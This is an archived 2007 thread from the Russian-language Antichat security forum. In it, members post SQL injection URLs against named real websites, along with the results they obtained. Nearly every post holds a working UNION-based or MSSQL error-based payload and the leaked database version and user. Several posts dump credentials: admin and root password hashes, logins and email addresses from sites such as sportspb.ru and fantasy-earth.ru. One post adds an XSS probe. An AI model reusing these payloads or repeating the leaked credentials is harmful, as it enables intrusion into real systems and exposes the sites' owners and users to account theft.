ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3911  
Старый 30.11.2007, 17:01
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

PR:4
Код:
http://www.inmerc.nl/product.php?id=32&cid=&artikelno=-5422+union+select+1,2,3,4,5,concat_ws(char(58),user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
inmerc@localhost:5.0.37:inmerc
 
Ответить с цитированием

  #3912  
Старый 30.11.2007, 17:14
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.carvip.ru/autocatalog/?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3/*

5.0.41/carvip_new/carvip_new@localhost

------------------------------------------------------------------------------

http://www.cinema.variety.ru/actors.php?cid=2&aid=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10,11,12,13/*

4.0.27-standard-log/variety_dvd/variety_dvd@localhost


------------------------------------------------------------------------------

http://stroyka.yandoo.ru/?sub=board&act=full&id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14/*

4.1.22/yandoo/yandoo@localhost

------------------------------------------------------------------------------

http://specserver.com/rus/notice.asp?groupID=-1+or+1=@@version

Microsoft SQL Server 2005 - 9.00.3159.00 (X64) Mar 23 2007 20:11:35 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

http://specserver.com/rus/notice.asp?groupID=-1+or+1=(select+system_user)-- specserver-2

http://specserver.com/rus/notice.asp?groupID=-1+or+1=(select+db_name())-- specserver-2
 
Ответить с цитированием

  #3913  
Старый 30.11.2007, 19:18
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Код:
http://culinary.org.ua/index.php?act=cat&id=-7+UNION+SELECT+1,2,3,4,version()/*
http://referat.findplace.ru/?id=-600+union+select+1/*
 
Ответить с цитированием

  #3914  
Старый 30.11.2007, 19:49
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

sportspb.ru

http://www.sportspb.ru/index.php?news=-1+union+select+concat_ws(0x2F,cast(version()+as+bi nary),cast(database()+as+binary),cast(user()+as+bi nary))/*

4.1.7-log/newsportspb/newsport@localhost



http://www.sportspb.ru/index.php?news=-1+union+select+concat_ws(0x2F,login,pass,email)+fr om+user+limit+0,1/*

логин/хеш/мейл
jtsport/f4f068e71e0d87bf0ad51e6214ab84e9/jt@sportspb.ru

-----------------------------------------------------------------------------
http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=@@version

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Workgroup Edition on Windows NT 5.2
(Build 3790: Service Pack 2)


http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=(select+system_user) kdoru

http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=(select+db_name()) kdoru

http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=(select+top+1+table_name+from+information_s chema.tables+where+table_name+not+in+('tblGuestNam e','tblSmut','ARTICLES','BANNERS','CAT_GOODS','CAT _TOPIC','CONFIG_VAR','dtproperties','kdo_ddu_arend a','kdo_ddu_arenda_snimu')) и тд.
 
Ответить с цитированием

  #3915  
Старый 30.11.2007, 22:43
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

PR:5
Код:
http://www.neurope.eu/view_news.php?id=-77501+union+select+1,concat_ws(char(58),user(),version(),database()),3,4,5,6,7,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*
neweuro_kostas@localhost:4.1.22-standard:neweuro_corporate


PR:3
Код:
http://www.it-bg.eu/viewtutorial.php?id=-8+union+select+1,2,3,4,5,6,concat_ws(char(58),user(),version(),database())/*
itbgeu_itbgeu@localhost:5.0.45:itbgeu_itbg

Код:
http://www.it-bg.eu/viewtutorial.php?id=-8+union+select+1,2,3,4,5,6,table_name+from+information_schema.tables/*
Выводится очень удобно )
Код:
admin
users
email
ip
forum_auth_access
forum_users
ibp_members
ibp_moderators
moderator
...
Код:
http://www.it-bg.eu/viewtutorial.php?id=-8+union+select+1,2,3,4,5,6,column_name+from+information_schema.columns/*
Код:
id
name
email
ip_address
username
user_password
user_email
user_icq
user
ip
...
Лень ковырятся (


PR:3
Код:
http://www.mypoolpal.eu/kiallitas/kiallitas.php?id=-1+union+select+1,2,concat_ws(char(58),user(),version(),database())/*
mypoolpal@localhost:4.1.21-standard:mypoolpal



Код:
http://www.mortarinvestments.eu/vehicle.php?id=-119+union+select+1,2,3,4,concat_ws(char(58),user(),version(),database()),6,7,8/*
zbozi.mortarinvestments.eu@193.86.238.53:5.0.44-log:zbozi_mortarinvestments_eu
 
Ответить с цитированием

  #3916  
Старый 30.11.2007, 23:10
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

http://vital.com/job_details.php?job_listing_id=http://www.google.fr/webhp%3f<balisexss>%22%27
 
Ответить с цитированием

  #3917  
Старый 01.12.2007, 00:00
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

DFA-link - Боян -------удалено--------

Washington City Paper
Код:
http://www.washingtoncitypaper.com/display.php?id=34079-1  +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+--+

Последний раз редактировалось Grey; 06.12.2007 в 23:24.. Причина: Часть поста - боян.
 
Ответить с цитированием

  #3918  
Старый 01.12.2007, 00:11
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.abt.org/ - American Ballet Theatre - Балет Пиндосов.

Код:
http://www.abt.org/insideabt/news_display.asp?News_ID=1+or+1=(SELECT+TOP+1+cast(C_Username+as+nvarchar)%2B%27%3A%27%2Bcast(C_Password+as+nvarchar)+from+CMS_USER+WHERE+CMS_USER_ID=2)--
http://www.gettysburg.travel Первый раз вижу сайт .travel...

Код:
http://www.gettysburg.travel/media/news_detail.asp?news_id=1+or+1=(SELECT+TOP+1+cast(user_id+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+tbl_user)--

Последний раз редактировалось Ded MustD!e; 01.12.2007 в 00:44..
 
Ответить с цитированием

  #3919  
Старый 01.12.2007, 00:46
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию

http://www.kenandogulu.com.tr/fun/detay.asp?id=0+union+select+0,1,2+from+

помогите подобрать сайт певца
 
Ответить с цитированием

  #3920  
Старый 01.12.2007, 01:26
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

fantasy-earth.ru

http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8/*

5.0.41/fe_site/fe_site@localhost




http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,user,Password),5,6,7,8
+from+mysql.user+limit+0,1/*

root/*7A75BB29F5CE202812218EEB56693A57AE394396



http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,LOGIN,PASSWORD,EMAIL),5,6,7,8+from
+alter_odon.b_user/*

admin/e10adc3949ba59abbe56e057f20f883e/webmaster@ourtestsite.ru



http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,LOGIN,PASSWORD,USE_MD5),5,6,7,8+from
+alter_odon.b_mail_mailbox+limit+0,1/*

test/6de+uCiE/N



еще присутствует IP.Board 2.2.2, но чет я так и не нашел где там хранятся юзверские пароли Оо поройтесь кому интересно:

http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,column_name,t able_name,table_schema),5,6,7,8+from+information_s chema.columns+where+column_name='password'/*

все таблицы где есть колонка password

Последний раз редактировалось ElteRUS; 01.12.2007 в 01:29..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ